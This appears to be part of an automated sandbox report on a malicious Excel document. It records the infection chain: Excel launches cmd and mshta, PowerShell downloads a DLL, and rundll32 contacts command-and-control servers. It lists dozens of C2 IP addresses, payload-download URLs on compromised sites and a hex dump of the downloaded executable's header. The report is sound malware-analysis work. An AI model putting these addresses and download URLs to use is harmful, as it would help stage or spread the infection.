                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,13_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,17_2_0035BAEA

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: tamiladsense.com
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.207.230.120 144Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 139.196.72.155 144Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 74.207.230.120:8080
                            Source: Malware configuration extractorIPs: 139.196.72.155:8080
                            Source: Malware configuration extractorIPs: 37.44.244.177:8080
                            Source: Malware configuration extractorIPs: 37.59.209.141:8080
                            Source: Malware configuration extractorIPs: 116.124.128.206:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 54.37.228.122:443
                            Source: Malware configuration extractorIPs: 203.153.216.46:443
                            Source: Malware configuration extractorIPs: 168.197.250.14:80
                            Source: Malware configuration extractorIPs: 207.148.81.119:8080
                            Source: Malware configuration extractorIPs: 195.154.146.35:443
                            Source: Malware configuration extractorIPs: 78.46.73.125:443
                            Source: Malware configuration extractorIPs: 191.252.103.16:80
                            Source: Malware configuration extractorIPs: 210.57.209.142:8080
                            Source: Malware configuration extractorIPs: 185.168.130.138:443
                            Source: Malware configuration extractorIPs: 142.4.219.173:8080
                            Source: Malware configuration extractorIPs: 118.98.72.86:443
                            Source: Malware configuration extractorIPs: 78.47.204.80:443
                            Source: Malware configuration extractorIPs: 159.69.237.188:443
                            Source: Malware configuration extractorIPs: 190.90.233.66:443
                            Source: Malware configuration extractorIPs: 104.131.62.48:8080
                            Source: Malware configuration extractorIPs: 62.171.178.147:8080
                            Source: Malware configuration extractorIPs: 185.148.168.15:8080
                            Source: Malware configuration extractorIPs: 54.38.242.185:443
                            Source: Malware configuration extractorIPs: 198.199.98.78:8080
                            Source: Malware configuration extractorIPs: 194.9.172.107:8080
                            Source: Malware configuration extractorIPs: 85.214.67.203:8080
                            Source: Malware configuration extractorIPs: 66.42.57.149:443
                            Source: Malware configuration extractorIPs: 185.148.168.220:8080
                            Source: Malware configuration extractorIPs: 103.41.204.169:8080
                            Source: Malware configuration extractorIPs: 128.199.192.135:8080
                            Source: Malware configuration extractorIPs: 195.77.239.39:8080
                            Source: Malware configuration extractorIPs: 59.148.253.194:443
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
                            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3B
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: DOCUMENT_2801.xls.0.drString found in binary or memory: http://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlfunction
                            Source: mshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmli
                            Source: mshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlngs
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.p
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.670073907.000000001B6A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.png
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.pngPE3
                            Source: mshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.17f
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.11x
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Get
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.sho
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOl
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.e
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3
                            Source: rundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-inclu
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfo
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: mshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/R
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/O
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/d
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serend
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/w
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_S
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minin
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: tamiladsense.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10012C30 _memset,connect,_strcat,send,recv,11_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
